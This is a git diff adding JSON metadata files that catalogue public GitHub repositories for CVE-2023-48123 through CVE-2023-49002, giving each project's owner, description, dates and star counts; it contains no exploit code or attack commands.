"pushed_at": "2024-01-10T16:09:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48123.json b/2023/CVE-2023-48123.json new file mode 100644 index 0000000000..089400cac7 --- /dev/null +++ b/2023/CVE-2023-48123.json @@ -0,0 +1,64 @@ +[ + { + "id": 719849140, + "name": "CVE-2023-48123", + "full_name": "NHPT\/CVE-2023-48123", + "owner": { + "login": "NHPT", + "id": 42366434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366434?v=4", + "html_url": "https:\/\/github.com\/NHPT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NHPT\/CVE-2023-48123", + "description": "CVE-2023-54436 Exp", + "fork": false, + "created_at": "2023-11-17T02:56:26Z", + "updated_at": "2023-11-17T04:12:44Z", + "pushed_at": "2023-11-17T02:56:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881546763, + "name": "CVE-2023-48123", + "full_name": "Farzan-Kh\/CVE-2023-48123", + "owner": { + "login": "Farzan-Kh", + "id": 65416059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65416059?v=4", + "html_url": "https:\/\/github.com\/Farzan-Kh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Farzan-Kh\/CVE-2023-48123", + "description": "CVE-2023-48123 exploit", + "fork": false, + "created_at": "2024-10-31T19:35:07Z", + "updated_at": "2024-11-01T08:55:26Z", + "pushed_at": "2024-11-01T08:54:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4813.json b/2023/CVE-2023-4813.json new file mode 100644 index 0000000000..6b1f242b98 --- /dev/null +++ b/2023/CVE-2023-4813.json @@ -0,0 +1,33 @@ +[ + { + "id": 811342524, + "name": "cve-2023-4813", + "full_name": "tnishiox\/cve-2023-4813", + "owner": { + "login": "tnishiox", + "id": 163162093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163162093?v=4", + "html_url": "https:\/\/github.com\/tnishiox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tnishiox\/cve-2023-4813", + "description": null, + "fork": false, + "created_at": "2024-06-06T12:12:57Z", + "updated_at": "2024-07-23T13:28:24Z", + "pushed_at": "2024-06-22T12:54:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48194.json b/2023/CVE-2023-48194.json new file mode 100644 index 0000000000..6087506814 --- /dev/null +++ b/2023/CVE-2023-48194.json @@ -0,0 +1,33 @@ +[ + { + "id": 824970501, + "name": "CVE-2023-48194", + "full_name": "zt20xx\/CVE-2023-48194", + "owner": { + "login": "zt20xx", + "id": 113044696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113044696?v=4", + "html_url": "https:\/\/github.com\/zt20xx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zt20xx\/CVE-2023-48194", + "description": null, + "fork": false, + "created_at": "2024-07-06T12:37:56Z", + "updated_at": "2024-11-13T15:55:19Z", + "pushed_at": "2024-07-06T13:56:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48197.json b/2023/CVE-2023-48197.json new file mode 100644 index 0000000000..4652ed3585 --- /dev/null +++ b/2023/CVE-2023-48197.json @@ -0,0 +1,33 @@ +[ + { + "id": 718709477, + "name": "CVE-2023-48197", + "full_name": "nitipoom-jar\/CVE-2023-48197", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48197", + "description": null, + "fork": false, + "created_at": "2023-11-14T16:34:21Z", + "updated_at": "2023-11-14T16:35:24Z", + "pushed_at": "2023-11-14T16:39:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48198.json b/2023/CVE-2023-48198.json new file mode 100644 index 0000000000..59f714d06e --- /dev/null +++ b/2023/CVE-2023-48198.json @@ -0,0 +1,33 @@ +[ + { + "id": 718711709, + "name": "CVE-2023-48198", + "full_name": "nitipoom-jar\/CVE-2023-48198", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48198", + "description": null, + "fork": false, + "created_at": "2023-11-14T16:40:03Z", + "updated_at": "2023-11-14T16:45:56Z", + "pushed_at": "2023-11-14T16:46:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48199.json b/2023/CVE-2023-48199.json new file mode 100644 index 0000000000..668cefb001 --- /dev/null +++ b/2023/CVE-2023-48199.json @@ -0,0 +1,33 @@ +[ + { + "id": 718716267, + "name": "CVE-2023-48199", + "full_name": "nitipoom-jar\/CVE-2023-48199", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48199", + "description": null, + "fork": false, + "created_at": "2023-11-14T16:50:31Z", + "updated_at": "2023-11-14T16:51:45Z", + "pushed_at": "2023-11-14T16:51:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48200.json b/2023/CVE-2023-48200.json new file mode 100644 index 0000000000..dd40ab595b --- /dev/null +++ b/2023/CVE-2023-48200.json @@ -0,0 +1,33 @@ +[ + { + "id": 718721117, + "name": "CVE-2023-48200", + "full_name": "nitipoom-jar\/CVE-2023-48200", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48200", + "description": null, + "fork": false, + "created_at": "2023-11-14T17:02:07Z", + "updated_at": "2023-11-14T17:02:57Z", + "pushed_at": "2023-11-14T17:02:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4863.json b/2023/CVE-2023-4863.json new file mode 100644 index 0000000000..7f7dd9a4f6 --- /dev/null +++ b/2023/CVE-2023-4863.json @@ -0,0 +1,343 @@ +[ + { + "id": 694489315, + "name": "CVE-2023-4863", + "full_name": "mistymntncop\/CVE-2023-4863", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-09-21T05:22:51Z", + "updated_at": "2024-11-01T16:02:36Z", + "pushed_at": "2023-12-18T04:25:00Z", + "stargazers_count": 315, + "watchers_count": 315, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 315, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 696220876, + "name": "CVE-2023-4863", + "full_name": "bbaranoff\/CVE-2023-4863", + "owner": { + "login": "bbaranoff", + "id": 37385191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37385191?v=4", + "html_url": "https:\/\/github.com\/bbaranoff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bbaranoff\/CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-09-25T10:33:09Z", + "updated_at": "2024-05-27T11:26:57Z", + "pushed_at": "2023-09-25T16:09:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696506973, + "name": "BAD-WEBP-CVE-2023-4863", + "full_name": "talbeerysec\/BAD-WEBP-CVE-2023-4863", + "owner": { + "login": "talbeerysec", + "id": 25826743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25826743?v=4", + "html_url": "https:\/\/github.com\/talbeerysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/talbeerysec\/BAD-WEBP-CVE-2023-4863", + "description": "BAD-WEBP-CVE-2023-4863", + "fork": false, + "created_at": "2023-09-25T22:10:32Z", + "updated_at": "2023-10-31T10:09:27Z", + "pushed_at": "2023-09-25T22:13:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 698015658, + "name": "Find-VulnerableElectronVersion", + "full_name": "OITApps\/Find-VulnerableElectronVersion", + "owner": { + "login": "OITApps", + "id": 24635345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24635345?v=4", + "html_url": "https:\/\/github.com\/OITApps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OITApps\/Find-VulnerableElectronVersion", + "description": "Scans an executable and determines if it was wrapped in an Electron version vulnerable to the Chromium vulnerability CVE-2023-4863\/ CVE-2023-5129", + "fork": false, + "created_at": "2023-09-29T00:42:37Z", + "updated_at": "2024-02-20T11:53:38Z", + "pushed_at": "2023-09-29T01:44:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 698469496, + "name": "ElectronVulnerableVersion", + "full_name": "GTGalaxi\/ElectronVulnerableVersion", + "owner": { + "login": "GTGalaxi", + "id": 10473238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10473238?v=4", + "html_url": "https:\/\/github.com\/GTGalaxi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GTGalaxi\/ElectronVulnerableVersion", + "description": "Find Electron Apps Vulnerable to CVE-2023-4863 \/ CVE-2023-5129", + "fork": false, + "created_at": "2023-09-30T02:47:16Z", + "updated_at": "2024-02-20T11:53:19Z", + "pushed_at": "2023-10-01T00:48:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700661789, + "name": "libwebp-checker", + "full_name": "murphysecurity\/libwebp-checker", + "owner": { + "login": "murphysecurity", + "id": 101661127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101661127?v=4", + "html_url": "https:\/\/github.com\/murphysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murphysecurity\/libwebp-checker", + "description": "A tool for finding vulnerable libwebp(CVE-2023-4863)", + "fork": false, + "created_at": "2023-10-05T03:28:23Z", + "updated_at": "2024-02-20T11:53:27Z", + "pushed_at": "2023-10-07T02:52:10Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 21, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 717339904, + "name": "CVE-2023-4863", + "full_name": "huiwen-yayaya\/CVE-2023-4863", + "owner": { + "login": "huiwen-yayaya", + "id": 128218264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128218264?v=4", + "html_url": "https:\/\/github.com\/huiwen-yayaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huiwen-yayaya\/CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-11-11T06:51:03Z", + "updated_at": "2024-06-08T08:18:54Z", + "pushed_at": "2024-06-08T08:18:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733255762, + "name": "webp-CVE-2023-4863", + "full_name": "LiveOverflow\/webp-CVE-2023-4863", + "owner": { + "login": "LiveOverflow", + "id": 12161158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4", + "html_url": "https:\/\/github.com\/LiveOverflow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiveOverflow\/webp-CVE-2023-4863", + "description": null, + "fork": false, + "created_at": "2023-12-18T23:12:25Z", + "updated_at": "2024-11-07T20:36:14Z", + "pushed_at": "2024-05-13T17:40:58Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 46, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 733283933, + "name": "NotEnough", + "full_name": "caoweiquan322\/NotEnough", + "owner": { + "login": "caoweiquan322", + "id": 5418686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5418686?v=4", + "html_url": "https:\/\/github.com\/caoweiquan322", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caoweiquan322\/NotEnough", + "description": "This tool calculates tricky canonical huffman histogram for CVE-2023-4863.", + "fork": false, + "created_at": "2023-12-19T01:32:45Z", + "updated_at": "2024-01-02T15:07:30Z", + "pushed_at": "2023-12-20T15:50:01Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 752488530, + "name": "CVE-2023-4863-", + "full_name": "CrackerCat\/CVE-2023-4863-", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2023-4863-", + "description": "Triggering the famous libweb 0day vuln with libfuzzer", + "fork": false, + "created_at": "2024-02-04T01:33:53Z", + "updated_at": "2024-02-04T01:33:53Z", + "pushed_at": "2024-02-03T12:51:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 753983723, + "name": "CVE-2023-4863-POC", + "full_name": "sarsaeroth\/CVE-2023-4863-POC", + "owner": { + "login": "sarsaeroth", + "id": 159212133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4", + "html_url": "https:\/\/github.com\/sarsaeroth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sarsaeroth\/CVE-2023-4863-POC", + "description": "C implementation of libwebp 0-click vulnerability", + "fork": false, + "created_at": "2024-02-07T06:58:16Z", + "updated_at": "2024-02-07T06:58:17Z", + "pushed_at": "2024-02-07T06:58:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48777.json b/2023/CVE-2023-48777.json new file mode 100644 index 0000000000..4931aab62d --- /dev/null +++ b/2023/CVE-2023-48777.json @@ -0,0 +1,33 @@ +[ + { + "id": 758657821, + "name": "Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777", + "full_name": "AkuCyberSec\/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777", + "owner": { + "login": "AkuCyberSec", + "id": 103601332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103601332?v=4", + "html_url": "https:\/\/github.com\/AkuCyberSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkuCyberSec\/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777", + "description": null, + "fork": false, + "created_at": "2024-02-16T19:36:50Z", + "updated_at": "2024-05-17T14:24:09Z", + "pushed_at": "2024-02-16T19:39:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48788.json b/2023/CVE-2023-48788.json new file mode 100644 index 0000000000..37aca3f9ea --- /dev/null +++ b/2023/CVE-2023-48788.json @@ -0,0 +1,33 @@ +[ + { + "id": 774039594, + "name": "CVE-2023-48788", + "full_name": "horizon3ai\/CVE-2023-48788", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-48788", + "description": "Fortinet FortiClient EMS SQL Injection", + "fork": false, + "created_at": "2024-03-18T20:50:48Z", + "updated_at": "2024-11-27T17:51:55Z", + "pushed_at": "2024-03-20T20:42:41Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 44, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48842.json b/2023/CVE-2023-48842.json new file mode 100644 index 0000000000..899f43c77c --- /dev/null +++ b/2023/CVE-2023-48842.json @@ -0,0 +1,33 @@ +[ + { + "id": 726637538, + "name": "CVE-2023-48842", + "full_name": "creacitysec\/CVE-2023-48842", + "owner": { + "login": "creacitysec", + "id": 151768625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151768625?v=4", + "html_url": "https:\/\/github.com\/creacitysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/creacitysec\/CVE-2023-48842", + "description": null, + "fork": false, + "created_at": "2023-12-02T23:21:44Z", + "updated_at": "2024-10-03T05:17:52Z", + "pushed_at": "2023-12-03T00:11:00Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48849.json b/2023/CVE-2023-48849.json new file mode 100644 index 0000000000..7a5ef3f2db --- /dev/null +++ b/2023/CVE-2023-48849.json @@ -0,0 +1,33 @@ +[ + { + "id": 726024742, + "name": "CVE-2023-48849", + "full_name": "delsploit\/CVE-2023-48849", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127108998?v=4", + "html_url": "https:\/\/github.com\/delsploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/delsploit\/CVE-2023-48849", + "description": null, + "fork": false, + "created_at": "2023-12-01T11:24:26Z", + "updated_at": "2023-12-01T11:24:26Z", + "pushed_at": "2023-12-05T06:09:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48858.json b/2023/CVE-2023-48858.json new file mode 100644 index 0000000000..98c7426b91 --- /dev/null +++ b/2023/CVE-2023-48858.json @@ -0,0 +1,33 @@ +[ + { + "id": 744440782, + "name": "CVE-2023-48858", + "full_name": "Shumerez\/CVE-2023-48858", + "owner": { + "login": "Shumerez", + "id": 52412906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52412906?v=4", + "html_url": "https:\/\/github.com\/Shumerez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shumerez\/CVE-2023-48858", + "description": "PoC for CVE-2023-48858", + "fork": false, + "created_at": "2024-01-17T09:59:39Z", + "updated_at": "2024-01-17T09:59:40Z", + "pushed_at": "2024-01-17T10:16:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48866.json b/2023/CVE-2023-48866.json new file mode 100644 index 0000000000..a3c49894d0 --- /dev/null +++ b/2023/CVE-2023-48866.json @@ -0,0 +1,33 @@ +[ + { + "id": 725661760, + "name": "CVE-2023-48866", + "full_name": "nitipoom-jar\/CVE-2023-48866", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-48866", + "description": null, + "fork": false, + "created_at": "2023-11-30T15:59:16Z", + "updated_at": "2023-11-30T16:01:02Z", + "pushed_at": "2023-11-30T16:00:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48974.json b/2023/CVE-2023-48974.json new file mode 100644 index 0000000000..169f196f2b --- /dev/null +++ b/2023/CVE-2023-48974.json @@ -0,0 +1,33 @@ +[ + { + "id": 736802783, + "name": "CVE-2023-48974", + "full_name": "vinnie1717\/CVE-2023-48974", + "owner": { + "login": "vinnie1717", + "id": 28691535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28691535?v=4", + "html_url": "https:\/\/github.com\/vinnie1717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinnie1717\/CVE-2023-48974", + "description": null, + "fork": false, + "created_at": "2023-12-28T23:24:22Z", + "updated_at": "2023-12-28T23:24:22Z", + "pushed_at": "2023-12-28T23:35:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48981.json b/2023/CVE-2023-48981.json new file mode 100644 index 0000000000..01c6ed2ee3 --- /dev/null +++ b/2023/CVE-2023-48981.json @@ -0,0 +1,33 @@ +[ + { + "id": 737775658, + "name": "CVE-2023-48981", + "full_name": "tristao-marinho\/CVE-2023-48981", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48981", + "description": "POC CVE-2023-48981", + "fork": false, + "created_at": "2024-01-01T13:06:39Z", + "updated_at": "2024-01-01T13:06:40Z", + "pushed_at": "2024-01-01T13:18:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48982.json b/2023/CVE-2023-48982.json new file mode 100644 index 0000000000..17a1573e25 --- /dev/null +++ b/2023/CVE-2023-48982.json @@ -0,0 +1,33 @@ +[ + { + "id": 737777512, + "name": "CVE-2023-48982", + "full_name": "tristao-marinho\/CVE-2023-48982", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48982", + "description": "POC CVE-2023-48982", + "fork": false, + "created_at": "2024-01-01T13:14:49Z", + "updated_at": "2024-01-01T13:14:49Z", + "pushed_at": "2024-01-01T13:17:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-48983.json b/2023/CVE-2023-48983.json new file mode 100644 index 0000000000..05adb7a92d --- /dev/null +++ b/2023/CVE-2023-48983.json @@ -0,0 +1,33 @@ +[ + { + "id": 737778720, + "name": "CVE-2023-48983", + "full_name": "tristao-marinho\/CVE-2023-48983", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-48983", + "description": "POC CVE-2023-48983", + "fork": false, + "created_at": "2024-01-01T13:19:54Z", + "updated_at": "2024-01-02T12:18:35Z", + "pushed_at": "2024-01-01T13:23:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49002.json b/2023/CVE-2023-49002.json new file mode 100644 index 0000000000..f207a90c1f --- /dev/null +++ b/2023/CVE-2023-49002.json @@ -0,0 +1,35 @@ +[ + { + "id": 720804876, + "name": "com.sinous.voice.dialer", + "full_name": "actuator\/com.sinous.voice.dialer", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.sinous.voice.dialer", + "description": "CVE-2023-49002", + "fork": false, + "created_at": "2023-11-19T16:51:09Z", + "updated_at": "2024-01-17T19:55:42Z", + "pushed_at": "2023-11-28T08:15:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-49002" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No 